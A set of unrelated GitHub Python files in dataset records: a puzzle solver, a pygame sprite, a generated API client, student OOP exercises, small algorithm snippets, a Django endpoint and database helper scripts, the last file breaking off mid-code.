(min_next_step, ordered_keys)\n\n\nclass RandomWalk:\n def __init__(self, labyrinth, position_initiale):\n self.labyrinth = labyrinth\n self.position_initiale = position_initiale\n self.step_to_key = {}\n\n def random_walk(self, position, steps, already_visited, doors):\n directions = [(position[0] + 1, position[1]), (position[0] - 1, position[1]),\n (position[0], position[1] + 1), (position[0], position[1] - 1)]\n for dir in directions:\n new_doors = copy.deepcopy(doors)\n if dir not in already_visited and self.labyrinth[dir] != \"#\":\n if self.labyrinth[dir] in LETTERS_CAPITAL:\n new_doors.add(self.labyrinth[dir].lower())\n elif self.labyrinth[dir] in LETTERS:\n if self.labyrinth[dir] in self.step_to_key:\n self.step_to_key[self.labyrinth[dir]].append((steps+1, new_doors))\n else:\n self.step_to_key[self.labyrinth[dir]] = [(steps+1, new_doors)]\n already_visited[dir] = 1\n position = dir\n self.random_walk(position, steps + 1, already_visited, new_doors)\n already_visited.pop(dir, None)\n\n def start_random_walk(self):\n self.random_walk(self.position_initiale, 0, {self.position_initiale: 1}, set())\n return self.step_to_key\n\n\nif __name__ == \"__main__\":\n # Part 1\n finder = KeyFinder(\"../data/2019/day18.txt\")\n x = finder.find_shortest_path(set(), \"@\")\n print(x)\n\n # Part 2\n finder = KeyFinder(\"../data/2019/day18.txt\", True)\n x = finder.find_shortest_path_part2(set(), [\"@\", \"!\", \"?\", \"%\"])\n print(x)","repo_name":"cavan26/advent-of-code","sub_path":"archive/day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":6402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3048279696","text":"import pygame\nimport math\nfrom GameSetting import *\nfrom GameObjects import Projectile\nimport SpriteBase\n\nvec = pygame.math.Vector2\n\nclass PlayerSprite(SpriteBase.GameSprite):\n UPDATE_FRAME_ON = 100\n\n def __init__(self, start_coord):\n super().__init__(start_coord)\n self.move_speed = Move.PLAYER_MOVE\n self.space_pushed = False\n self.is_dead = False\n self.nerf_dart_image_right = pygame.image.load(Game.NERF_DART_IMAGE).convert()\n self.nerf_dart_image_left = pygame.transform.flip(self.nerf_dart_image_right, True, False)\n self.sprite_sheet = SpriteBase.Spritesheet(Player.ZOEY_SPRITE_SHEET)\n self.load_player_sprites()\n self.image_set = self.stop_image_left\n self.image = self.image_set[0]\n self.rect = self.image.get_rect()\n self.direction = Move.STOP\n self.facing = Move.RIGHT\n self.jump_buffer = None\n self.duck = False\n self.run = False\n self.onGround = False\n self.current_frame = 0\n self.last_frame = 0\n self.gun = None\n self.rect.move_ip(self.pos)\n self.collision_rect = self.rect.inflate(Player.PLAYER_X_SHRINK, Player.PLAYER_Y_SHRINK)\n self.jump_sound = pygame.mixer.Sound(Player.PLAYER_JUMP_SOUND)\n self.shoot_sound = pygame.mixer.Sound(Player.PLAYER_SHOOT_SOUND)\n self.shoot_sound.set_volume(100)\n self.bullets = SpriteBase.BulletBaseGroup()\n\n def load_player_sprites(self):\n self.frames_right = [self.sprite_sheet.get_image_row_column(Player.PLAYER_SPRITE_WIDTH, Player.PLAYER_SPRITE_HEIGHT, 0, 0),\n self.sprite_sheet.get_image_row_column(Player.PLAYER_SPRITE_WIDTH, Player.PLAYER_SPRITE_HEIGHT, 1, 0),\n self.sprite_sheet.get_image_row_column(Player.PLAYER_SPRITE_WIDTH, Player.PLAYER_SPRITE_HEIGHT, 2, 0)]\n self.stop_image_right = [self.sprite_sheet.get_image_row_column(Player.PLAYER_SPRITE_WIDTH, Player.PLAYER_SPRITE_HEIGHT, 3, 0)]\n self.stop_image_left = [pygame.transform.flip(self.stop_image_right[0], True, False)]\n self.image_jump_right = self.sprite_sheet.get_image_row_column(Player.PLAYER_SPRITE_WIDTH, Player.PLAYER_SPRITE_HEIGHT, 4, 0)\n self.image_jump_left = pygame.transform.flip(self.image_jump_right, True, False)\n self.frames_left = []\n for image in self.frames_right:\n self.frames_left.append(pygame.transform.flip(image, True, False))\n\n def get_bullets(self):\n return self.bullets\n\n def draw(self, display):\n display.blit(self.image, self.rect)\n \n if Game.DEBUG:\n collisiont_rect_image = pygame.Surface((self.collision_rect.width, self.collision_rect.height))\n collisiont_rect_image.fill((120,230,20))\n display.blit(collisiont_rect_image, self.collision_rect)\n\n def move(self, direction, stop_movement=False):\n if stop_movement and self.direction == direction:\n self.direction = Move.STOP\n if direction == Move.LEFT:\n self.image_set = self.stop_image_left\n else:\n self.image_set = self.stop_image_right\n elif not stop_movement:\n if not direction == self.direction:\n self.current_frame = 0\n self.direction = direction\n self.facing = direction\n \n def set_duck(self, duck):\n self.duck = duck\n\n def set_run(self, run):\n self.run = run\n \n def jump(self):\n if self.onGround and not self.jump_buffer == None:\n if pygame.time.get_ticks() - self.jump_buffer <= Control.JUMP_FOGIVENESS:\n self.jump_sound.play()\n self.onGround = False\n self.acc.y = Move.PLAYER_JUMP\n self.jump_buffer = None\n if self.facing == Move.LEFT:\n self.image = self.image_jump_left\n else:\n self.image = self.image_jump_right\n\n \"\"\" add a jumper to the buffer with the current time of button press\n This will make jumping more responsive since you can press button slightly before hitting the ground and still\n have jump register \"\"\"\n def add_jump_to_buffer(self):\n self.jump_buffer = pygame.time.get_ticks()\n\n def set_move_speed(self):\n if self.move_speed == Move.PLAYER_MOVE:\n if self.run and self.onGround:\n self.move_speed = Move.PLAYER_RUN\n if self.move_speed == Move.PLAYER_RUN:\n if not self.run and self.onGround:\n self.move_speed = Move.PLAYER_MOVE\n\n def update(self, friction, gravity, floor):\n force = False\n self.set_move_speed()\n if self.direction == Move.LEFT:\n self.acc.x = -self.move_speed\n self.image_set = self.frames_left\n if self.direction == Move.RIGHT:\n self.acc.x = self.move_speed\n self.image_set = self.frames_right\n self.jump()\n \n self.acc.x += self.vel.x * friction\n if math.fabs(self.acc.x) <= Move.ZERO_THRESHOLD and self.onGround and self.direction == Move.STOP:\n self.acc.x = 0\n self.vel.x = 0\n \n self.update_position(gravity)\n #print(\"vel = \"+str(self.vel) + \"acc = \"+str(self.acc) + \"pos = \"+str(self.pos))\n\n if self.pos.y > floor:\n self.is_dead = True\n self.acc = vec(0, gravity)\n \n self.animate(force)\n self.onGround = False\n\n def animate(self, force):\n now = pygame.time.get_ticks()\n if (now - self.last_frame >= self.UPDATE_FRAME_ON) and self.onGround or (force):\n self.last_frame = now\n self.current_frame += 1\n if self.current_frame >= len(self.image_set):\n self.current_frame = 0\n self.image = self.image_set[self.current_frame] \n\n def set_position(self, object):\n y_vel = math.ceil(self.vel.y + .5 * self.acc.y)\n #print(\"object top = \" + str(object.rect.top)+' self bottom = ' +str(self.rect.bottom) + \" y_vel = \"+str(y_vel))\n if self.vel.y > 0 and object.rect.top >= self.rect.bottom - y_vel:\n self.vel.y = 0\n if self.rect.bottom - 1 == object.rect.top:\n self.onGround = True\n self.pos.y = object.rect.top - self.rect.height\n\n def kill_enemy(self, enemy, gravity):\n y_vel = math.ceil(self.vel.y + .5 * self.acc.y)\n # print('enemy top: '+str(enemy.rect.top) + ' self bottom: '+str(self.rect.bottom) + ' yvel = '+str(y_vel)\n # +' vel = '+str(self.vel))\n if self.vel.y - gravity > 0 and enemy.get_collision_rect().top >= self.collision_rect.bottom - y_vel:\n self.vel.y = Move.PLAYER_POP\n return True\n else:\n self.is_dead = True\n return False\n \n def set_gun(self, gun):\n self.gun = gun\n \n def get_ammo(self):\n ammo = 0\n if not self.gun == None:\n ammo = self.gun.get_ammo_amount()\n return ammo\n\n def shoot(self):\n if not self.gun == None and self.gun.get_ammo_amount() > 0:\n self.gun.set_ammo_amount(self.gun.get_ammo_amount() - 1)\n self.shoot_sound.play()\n if self.facing == Move.LEFT:\n self.bullets.add(Projectile(-self.gun.get_x_shoot_speed(),\n self.gun.get_y_shoot_speed(), (self.rect.x-self.nerf_dart_image_left.get_rect().width,self.rect.y+self.rect.height/2), self.nerf_dart_image_left))\n if self.facing == Move.RIGHT:\n self.bullets.add(Projectile(self.gun.get_x_shoot_speed(\n ), self.gun.get_y_shoot_speed(), self.rect.midright, self.nerf_dart_image_right))\n\n def add_ammo(self, amount):\n if not self.gun == None:\n self.gun.set_ammo_amount(self.gun.get_ammo_amount() + 1)\n","repo_name":"pojo79/ZoeyGame","sub_path":"PlayerSprite.py","file_name":"PlayerSprite.py","file_ext":"py","file_size_in_byte":7930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72460949605","text":"\"\"\"\n Deutschlandatlas-API\n\n Der [Deutschlandatlas](https://www.deutschlandatlas.bund.de/DE/Home/home_node.html) ist ein Internetangebot, herausgegeben vom Bundesministerium für Wohnen, Stadtentwicklung und Bauwesen. Dort finden sich interaktive Karten zu gleichwertigen Lebensverhältnissen auf Grundlage aktueller verfügbarer Daten. Informationen zu allen [Indikatoren](https://www.deutschlandatlas.bund.de/DE/Service/Downloads/Indikatoren_Deutschlandatlas.html) sowie aktuelle Daten in [tabellarischer Form](https://www.deutschlandatlas.bund.de/DE/Service/Downloads/downloads_node.html) stehen online zum Download bereit. # noqa: E501\n\n The version of the OpenAPI document: 1.0.0\n Contact: kontakt@bund.dev\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport re # noqa: F401\nimport sys # noqa: F401\n\nfrom deutschland.Deutschlandatlas.api_client import ApiClient\nfrom deutschland.Deutschlandatlas.api_client import Endpoint as _Endpoint\nfrom deutschland.Deutschlandatlas.model_utils import ( # noqa: F401\n check_allowed_values,\n check_validations,\n date,\n datetime,\n file_type,\n none_type,\n validate_and_convert_types,\n)\n\n\nclass DefaultApi(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n def __init__(self, api_client=None):\n if api_client is None:\n api_client = ApiClient()\n self.api_client = api_client\n self.query_endpoint = _Endpoint(\n settings={\n \"response_type\": (\n {\n str: (\n bool,\n date,\n datetime,\n dict,\n float,\n int,\n list,\n str,\n none_type,\n )\n },\n ),\n \"auth\": [],\n \"endpoint_path\": \"/{table}/MapServer/0/query\",\n \"operation_id\": \"query\",\n \"http_method\": \"GET\",\n \"servers\": None,\n },\n params_map={\n \"all\": [\n \"table\",\n \"where\",\n \"f\",\n \"out_fields\",\n \"return_geometry\",\n \"spatial_rel\",\n ],\n \"required\": [\n \"table\",\n \"where\",\n \"f\",\n ],\n \"nullable\": [],\n \"enum\": [],\n \"validation\": [],\n },\n root_map={\n \"validations\": {},\n \"allowed_values\": {},\n \"openapi_types\": {\n \"table\": (str,),\n \"where\": (str,),\n \"f\": (str,),\n \"out_fields\": (str,),\n \"return_geometry\": (bool,),\n \"spatial_rel\": (str,),\n },\n \"attribute_map\": {\n \"table\": \"table\",\n \"where\": \"where\",\n \"f\": \"f\",\n \"out_fields\": \"outFields\",\n \"return_geometry\": \"returnGeometry\",\n \"spatial_rel\": \"spatialRel\",\n },\n \"location_map\": {\n \"table\": \"path\",\n \"where\": \"query\",\n \"f\": \"query\",\n \"out_fields\": \"query\",\n \"return_geometry\": \"query\",\n \"spatial_rel\": \"query\",\n },\n \"collection_format_map\": {},\n },\n headers_map={\n \"accept\": [\"application/json\"],\n \"content_type\": [],\n },\n api_client=api_client,\n )\n\n def query(self, f, table=\"p_apo_f_ZA2022\", where=\"1%3D1\", **kwargs):\n \"\"\"query # noqa: E501\n\n Im JSON-Format lassen sich aktuelle und historische Daten zu ausgewählten Indikatoren über GET-requests folgender Machart erhalten # noqa: E501\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n\n >>> thread = api.query(f, table=\"p_apo_f_ZA2022\", where=\"1%3D1\", async_req=True)\n >>> result = thread.get()\n\n Args:\n f (str): Output-Format (z.B. 'json' oder 'html').\n table (str): Angaben zu allen online vorliegenden Tabellen finden sich [hier](https://www.karto365.de/portal/sharing/rest/search?q=deutschlandatlas&f=json&num=100&start=1) und [hier](https://www.karto365.de/portal/sharing/rest/search?q=deutschlandatlas&f=json&num=100&start=101) . defaults to \"p_apo_f_ZA2022\", must be one of [\"p_apo_f_ZA2022\"]\n where (str): Spezifikation einer gewünschten Teilmenge der Daten (z.B.'1=1').. defaults to \"1%3D1\", must be one of [\"1%3D1\"]\n\n Keyword Args:\n out_fields (str): Auszugebende Variablen/fields (z.B. '*').. [optional]\n return_geometry (bool): Boolsche Angabe, ob Angaben zur Geometrie gesendet werden sollen (z.B. 'false').. [optional]\n spatial_rel (str): spational relation (z.B. 'esriSpatialRelIntersects').. [optional]\n _return_http_data_only (bool): response data without head status\n code and headers. Default is True.\n _preload_content (bool): if False, the urllib3.HTTPResponse object\n will be returned without reading/decoding response data.\n Default is True.\n _request_timeout (int/float/tuple): timeout setting for this request. If\n one number provided, it will be total request timeout. It can also\n be a pair (tuple) of (connection, read) timeouts.\n Default is None.\n _check_input_type (bool): specifies if type checking\n should be done one the data sent to the server.\n Default is True.\n _check_return_type (bool): specifies if type checking\n should be done one the data received from the server.\n Default is True.\n _spec_property_naming (bool): True if the variable names in the input data\n are serialized names, as specified in the OpenAPI document.\n False if the variable names in the input data\n are pythonic names, e.g. snake case (default)\n _content_type (str/None): force body content-type.\n Default is None and content-type will be predicted by allowed\n content-types and body.\n _host_index (int/None): specifies the index of the server\n that we want to use.\n Default is read from the configuration.\n _request_auths (list): set to override the auth_settings for an a single\n request; this effectively ignores the authentication\n in the spec for a single request.\n Default is None\n async_req (bool): execute request asynchronously\n\n Returns:\n {str: (bool, date, datetime, dict, float, int, list, str, none_type)}\n If the method is called asynchronously, returns the request\n thread.\n \"\"\"\n kwargs[\"async_req\"] = kwargs.get(\"async_req\", False)\n kwargs[\"_return_http_data_only\"] = kwargs.get(\"_return_http_data_only\", True)\n kwargs[\"_preload_content\"] = kwargs.get(\"_preload_content\", True)\n kwargs[\"_request_timeout\"] = kwargs.get(\"_request_timeout\", None)\n kwargs[\"_check_input_type\"] = kwargs.get(\"_check_input_type\", True)\n kwargs[\"_check_return_type\"] = kwargs.get(\"_check_return_type\", True)\n kwargs[\"_spec_property_naming\"] = kwargs.get(\"_spec_property_naming\", False)\n kwargs[\"_content_type\"] = kwargs.get(\"_content_type\")\n kwargs[\"_host_index\"] = kwargs.get(\"_host_index\")\n kwargs[\"_request_auths\"] = kwargs.get(\"_request_auths\", None)\n kwargs[\"table\"] = table\n kwargs[\"where\"] = where\n kwargs[\"f\"] = f\n return self.query_endpoint.call_with_http_info(**kwargs)\n","repo_name":"AndreasFischer1985/deutschlandatlas-api","sub_path":"python-client/deutschland/Deutschlandatlas/api/default_api.py","file_name":"default_api.py","file_ext":"py","file_size_in_byte":8336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"73342146085","text":"class Persona(object):\n\n def __init__(self, dni, nombre, apellido, anioNacimiento, sexo):\n # Constructor de clase Persona\n self.dni = dni\n self.nombre = nombre\n self.apellido = apellido\n self.sexo = str(sexo)\n self.anioNacimiento = int(anioNacimiento)\n\n def getGenero(self, sexo):\n genero = ('Masculino','Femenino')\n if sexo.upper() == \"M\":\n return genero[0]\n elif sexo.upper() == \"F\":\n return genero[1]\n else:\n return \"Desconocido\"\n\n def getGeneracion(self, anioNacimiento):\n generacion = ''\n if(anioNacimiento >= 1930 and anioNacimiento <= 1948):\n generacion = 'Silent Generation'\n elif(anioNacimiento >= 1949 and anioNacimiento <= 1968):\n generacion = 'Baby Boom'\n elif(anioNacimiento >= 1969 and anioNacimiento <= 1980):\n generacion = \"Generacion X\"\n elif(anioNacimiento >= 1981 and anioNacimiento <= 1993):\n generacion = \"Generacion Y: Millenials\"\n elif(anioNacimiento >= 1994 and anioNacimiento <= 2010):\n generacion = \"Generacion Z\"\n else:\n generacion = 'Geneacion desconocida'\n return generacion\n\nclass estudiante(Persona):\n # Clase que representa a un estudiante\n\n def __init__(self, nombre, apellido, dni, anioNacimiento, sexo, carrera, lugarDeEstudio):\n\n # Invoco al constructor de clase Persona\n Persona.__init__(self, dni, nombre, apellido, anioNacimiento, sexo)\n\n # Nuevos atributos\n self.carrera = carrera\n self.lugarDeEstudio = lugarDeEstudio\n\n def mostrarDatos(self):\n return \"Estudiante: \" + self.nombre + \" \" + self.apellido + \"\\nCarrera: \" + self.carrera + \"\\nLugar De Estudio: \" + self.lugarDeEstudio +\".\"\n\n\ndef cargarEstudiante():\n print(\"Carga de datos del estudiante\")\n nombre = input(\"Nombre: \")\n apellido = input(\"Apellido: \")\n sexo = input(\"Sexo: \")\n dni = input(\"DNI: \")\n anioNacimiento = int(input(\"Año de nacimiento: \"))\n carrera = input(\"Carrera: \")\n lugarDeEstudio = input(\"Lugar de estudio: \") \n print(\"-----------------------------\")\n return estudiante(nombre, apellido, dni, anioNacimiento, sexo, carrera, lugarDeEstudio)\n\ndef ejecutarOpciones(estudiante2): \n opcion = int(input(\"Que desea realizar?\\n1- Ver a que generacion pertenece el estudiante.\\n2- Ver los datos del estudiante.\\n\"))\n while opcion == 1 or opcion == 2 or opcion == 3:\n if (opcion == 1):\n print(estudiante2.getGeneracion(estudiante2.anioNacimiento))\n elif (opcion == 2):\n print(estudiante2.mostrarDatos())\n elif (opcion == 3):\n cargarEstudiante()\n print(\"-----------------------------\")\n opcion = int(input(\"Desea realizar algo mas?\\n1- Ver a que generacion pertenece el estudiante.\\n2- Ver los datos del estudiante.\\n3- Cargar otro estudiante.\\n0- Salir\\n\"))\n\nestudiante2 = cargarEstudiante()\nejecutarOpciones(estudiante2)\n\n# persona1 = Persona(12345678, \"Leonardo\", \"Caballero\", 1965, \"m\")\n\n# print(persona1.getGenero(persona1.sexo))\n\n# estudiante1 = estudiante(\"11234567\", \"Jen\", \"Paz\", 1968, \"M\", \"compu\", \"ispc\")\n\n# print(estudiante1.getGeneracion(estudiante1.anioNacimiento))\n\n# print(estudiante1.mostrarDatos())","repo_name":"EricERodriguez/IEFI-Programacion","sub_path":"POO.py","file_name":"POO.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73512539045","text":"n=int(input(\"Enter the number \"))\r\nsum=0\r\nmul=1\r\nwhile n>0:\r\n dig=n%10\r\n sum=sum+dig\r\n mul=mul*dig\r\n n=n//10\r\nif sum==mul:\r\n print(\"Spy number\")\r\nelse:\r\n print(\"Not a spy number\")","repo_name":"sajilasharafu/python","sub_path":"spy.py","file_name":"spy.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10704452790","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.left = self.right = None\n\n\ndef build(arr):\n if len(arr) == 0:\n return None\n\n if len(arr) == 1:\n return Node(arr[0])\n\n mid = (len(arr))//2\n node = Node(arr[mid])\n node.left = build(arr[:mid])\n node.right = build(arr[mid+1:])\n\n return node\n\n\ndef closest_value(root, target):\n a = root.value\n kid = root.left if target < a else root.right\n if not kid:\n return a\n b = closest_value(kid, target)\n return min((a, b), key=lambda x: abs(target-x))\n\n\nif __name__ == \"__main__\":\n arr = [1, 13, 17, 20, 24, 35, 46]\n node = build(arr)\n\n assert closest_value(node, 23) == 24\n","repo_name":"ne7ermore/playground","sub_path":"python/tree/bst_closest_value.py","file_name":"bst_closest_value.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"6998426338","text":"\"\"\"\n@description: Django 服务入口文件,提供 get_result 接口返回查询图\n@author: Cui Rui long\n@email: xiaocuikindle@163.com\n@time: 2019-11-08\n@version: 0.0.1\n\"\"\"\nimport timeit\nimport json\nimport logging\n\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom time_server.source.time_module.time_normalizer import TimeNormalizer\n\n# 定义整体服务用到的日志文件\nlogger = logging.getLogger(\"server_log\")\n\n\n# 在这里定义在整个程序都会用到的类的实例\ntime_normalizer = TimeNormalizer()\n\n\n# 服务的接口文档\n@csrf_exempt\ndef get_result(request):\n \"\"\"\n input: 接收客户端发送的POST请求:{\"sentence\": \"raw_sentence\"}\n output: 服务器返回JSON格式的数据,返回的数据格式如下:\n :param request: 用户输入的查询句子\n :return\n \"\"\"\n\n if request.method != 'POST':\n logger.error(\"仅支持post访问\")\n return JsonResponse({\"result\": {}, \"msg\": \"仅支持post访问\"}, json_dumps_params={'ensure_ascii': False})\n\n request_data = json.loads(request.body)\n sentence = request_data['sentence']\n\n start_time = timeit.default_timer()\n\n # 时间归一化逻辑代码\n result = time_normalizer.parse(sentence)\n\n end_time = timeit.default_timer()\n logger.info(\"Full time consume: {0} S.\\n\".format(end_time - start_time))\n # 返回JSON格式数据,将 result_ner 替换成需要返回的JSON数据\n return JsonResponse(result, json_dumps_params={'ensure_ascii': False})","repo_name":"xiaocuigit/time_x_machine","sub_path":"time_server/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24837040381","text":"import mysql.connector\nimport pandas as pd\nimport datetime\nimport calendar\n\n# from secreto import *\nfrom BBDD.secreto import *\n\nclass Pronostico():\n def __init__(self):\n self.mydb = mysql.connector.connect(host=host, user=user, password=password, database=database)\n\n def datosPedidos(self, desde, hasta):\n\n # hasta = datetime.datetime.strptime(hasta, \"%Y-%m-%d\")\n # print(hasta)\n # hasta = hasta + datetime.timedelta(days=-1)\n # print(hasta)\n\n mycursor =self.mydb.cursor()\n sql = \"SELECT fecha_ped, SUM(cantidad_ped) FROM pedido WHERE fecha_ped BETWEEN %s AND %s GROUP BY fecha_ped\"\n mycursor.execute(sql,(desde, hasta))\n myresult = mycursor.fetchall()\n \n df = pd.DataFrame(myresult, columns=[\"fecha_ped\",\"cantidad_ped\"])\n df[\"fecha_ped\"] = pd.to_datetime(df[\"fecha_ped\"])\n df.set_index(\"fecha_ped\", inplace=True)\n ultima_fecha = max(df.index)\n # ultimo_dia_mes = calendar.monthrange(ultima_fecha.year, ultima_fecha.month)[1]\n inicio = min(df.index)\n # fin = ultima_fecha.replace(day=ultimo_dia_mes)\n index = pd.date_range(start=inicio, end=ultima_fecha, freq=\"D\")\n df = df.reindex(index)\n df = df.fillna(0)\n df[\"cantidad_ped\"] = df[\"cantidad_ped\"].astype(float)\n return df\n","repo_name":"sandracarmona1/SAPIM","sub_path":"BBDD/pronosticos.py","file_name":"pronosticos.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36084632463","text":"input = 20\n\nmemoize = [0]* 3\nmemoize[0] = 0\nmemoize[1] = 1\n\ndef helper(n):\n\n for i in range(2,n+1):\n memoize[i%3] = memoize[(i-1)%3] + memoize[(i-2)%3]\n\n\nhelper(input)\nprint(memoize)\nprint(len(memoize))\n\n\n\n","repo_name":"ajaygc95/DS-ALGO","sub_path":"Algorithms/Dynamic Programming/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11077146821","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 18 15:33:04 2017\n\n@author: zhenshan\n\"\"\"\nimport psycopg2\n\ndef ReadFile(filename, conn_str):\n #not sure if this is ok, or I have to maintain a list in sql\n #for now, do this. I can switch to sql later.\n # Connect to an existing database\n\n\n valid_names =[\"Org\", \"Meet\", \"Participant\", \"Event\", \"Stroke\", \"Distance\", \"Heat\", \"Swim\", \"Leg\", \"StrokeOf\"]\n is_valid=False\n\n try:\n myfile = open(filename, \"r\")\n except IOError:\n print(\"Could not open file \")\n return;\n\n for line in myfile.readlines():\n\n if line.startswith(\"*\"):\n vals=line[:-1].split(\",\");\n line=[x for x in vals if x]\n if (valid_names.count(line[0][1:])>0):\n is_valid=True\n table_name=line[0][1:]\n else:\n is_valid=False\n else:\n #check that the function name is valid first\n #if we don't have a real table name, don't bother\n if(is_valid):\n if((table_name=='Stroke')or (table_name=='Distance')or (table_name=='Leg')) :\n vals=line[:-1].split(\",\");\n vals=[x for x in vals if x]\n #vals=line[:-1];\n callInsert(table_name, vals[0], conn_str)\n else:\n vals=line[:-1].split(\",\");\n vals=[x for x in vals if x]\n callInsert(table_name, vals, conn_str)\n\ndef ReadFileMenu(conn_str):\n selection= input(\"Please Input the file name\")\n ReadFile(selection, conn_str)\n\ndef callInsert(table_name, arg_list, conn_str):\n valid_names =[\"Org\", \"Meet\", \"Participant\", \"Event\", \"Stroke\", \"Distance\", \"Heat\", \"Swim\", \"Leg\", \"StrokeOf\"]\n arg_count =[3, 4, 3, 3,1 , 1, 3, 6, 1, 3]\n\n try:\n conn=psycopg2.connect(conn_str)\n except:\n print(\"I am unable to connect to the database\")\n return;\n\n # Open a cursor to perform database operations\n cur = conn.cursor()\n if (table_name==\"Org\"):\n if(len(arg_list)!=3):\n print(\"Org requires 3 arguments:\")\n else:\n cur.callproc('InsertOrg', (arg_list[0], arg_list[1], arg_list[2]))\n\n if (table_name==\"Meet\"):\n if(len(arg_list)!=4):\n print(\"Meet requires 4 arguments:\")\n else:\n cur.callproc('InsertMeet', (arg_list[0], arg_list[1], arg_list[2], arg_list[3]))\n\n if (table_name==\"Participant\"):\n if(len(arg_list)!=4):\n print(\"Participant requires 4 arguments:\")\n else:\n cur.callproc('InsertParticipant', (arg_list[0], arg_list[1], arg_list[2], arg_list[3]))\n\n if (table_name==\"Event\"):\n if(len(arg_list)!=3):\n print(\"Event requires 3 arguments:\")\n print(\"X\", arg_list, \"X\")\n else:\n cur.callproc('InsertEvent', (arg_list[0], arg_list[1], arg_list[2]))\n\n\n if (table_name==\"Stroke\"):\n #if(len(arg_list)!=1):\n #print(\"Stroke requires 1 arguments:\")\n #else:\n cur.callproc('InsertStroke', (arg_list,))\n\n if (table_name==\"Distance\"):\n #if(len(arg_list)!=1):\n # print(\"Distance requires 1 arguments:\")\n #else:\n\n cur.callproc('InsertDistance', (int(arg_list),))\n\n if (table_name==\"Heat\"):\n if(len(arg_list)!=3):\n print(\"Heat requires 3 arguments:\")\n else:\n cur.callproc('InsertHeat', (arg_list[0], arg_list[1], arg_list[2]))\n\n if (table_name==\"Swim\"):\n if(len(arg_list)!=6):\n print(\"Swim requires 6 arguments:\")\n else:\n cur.callproc('InsertSwim', (arg_list[0], arg_list[1], arg_list[2], arg_list[3], int(arg_list[4]), float(arg_list[5])))\n\n if (table_name==\"Leg\"):\n #if(len(arg_list)!=1):\n #print(\"Leg requires 1 arguments:\")\n #else:\n cur.callproc('InsertLeg', (int(arg_list),))\n\n if (table_name==\"StrokeOf\"):\n if(len(arg_list)!=3):\n print(\"StrokeOf requires 3 arguments:\")\n else:\n cur.callproc('InsertStrokeOf', (arg_list[0], arg_list[1], arg_list[2]))\n\n\n conn.commit()\n\n # Close communication with the database\n cur.close()\n conn.close()\n\ndef AddRowMenu(conn_str):\n valid_names =[\"Org\", \"Meet\", \"Participant\", \"Event\", \"Stroke\", \"Distance\", \"Heat\", \"Swim\", \"Leg\", \"StrokeOf\"]\n name_not_valid=True\n while(name_not_valid):\n selection= input(\"What Table Do You Want to Add A Row to?\\n(Org, Meet, Participant, Event, Stroke, Distance, Heat, Swim, Leg, StrokeOf)\\n\")\n print(\"read in:\", selection)\n #make sure the name is valid\n if(valid_names.count(selection)>0):\n name_not_valid=False\n table_name=selection\n #get the available tables from the database\n # Connect to an existing database\n # Connect to an existing database\n try:\n conn=psycopg2.connect(conn_str)\n except:\n print(\"I am unable to connect to the database\")\n return;\n querry=\"SELECT reminder FROM Remind WHERE tablename='\"+ table_name+\"'\"\n cur = conn.cursor()\n cur.execute(querry)\n # Make the changes to the database persistent\n rows = cur.fetchall()\n conn.commit()\n # Close communication with the database\n cur.close()\n conn.close()\n #should only be 1 row, but I'm itterating to get at it.\n print(\"Insert the fields separated by commas [,] . Use NULL in place of a field to omit it.\")\n for r in rows:\n print (r[0])\n selection=input()\n vals=selection[:-1].split(\",\");\n vals=[x for x in vals if x]\n if((table_name=='Stroke')or (table_name=='Distance')or (table_name=='Leg')) :\n #vals=line[:-1];\n callInsert(table_name, vals[0])\n else:\n callInsert(table_name, vals)\n \ndef ChangeRowMenu(conn_str):\n valid_names =[\"Org\", \"Participant\", \"Event\"]\n name_not_valid=True\n while(name_not_valid):\n selection= input(\"What Table Do You Want to Change?\\n(Org, Participant, Event)\\n\")\n #print(\"read in:\", selection)\n #make sure the name is valid\n if(valid_names.count(selection)>0):\n name_not_valid=False\n table_name=selection\n #get the available tables from the database\n # Connect to an existing database\n # Connect to an existing database\n try:\n conn=psycopg2.connect(conn_str)\n except:\n print(\"I am unable to connect to the database\")\n return;\n # querry=\"SELECT reminder FROM RemindPrimaryKey WHERE TableName='\"+ table_name+\"'\"\n cur = conn.cursor()\n # cur.execute(querry)\n cur.callproc('GetPrimaryKey', (table_name, ))\n # Make the changes to the database persistent\n rows = cur.fetchall()\n conn.commit()\n\n for r in rows:\n primary_key= (r[0])\n print(\"Update will be based on primary_key:\", primary_key)\n #should only be 1 row, but I'm itterating to get at it.\n print(\"Enter primary key:\")\n selection=input()\n #make sure primary key exists\n #MAKE SURE PRIMARY KEY IS VALID!!!!!\n\n cur = conn.cursor()\n cur.callproc('GetNotPrimaryKey', (table_name, ))\n # Make the changes to the database persistent\n rows = cur.fetchall()\n conn.commit()\n # Close communication with the database\n cur.close()\n conn.close()\n #should only be 1 row, but I'm itterating to get at it.\n print(\"Insert the fields separated by commas [,] . Use NULL in place of a 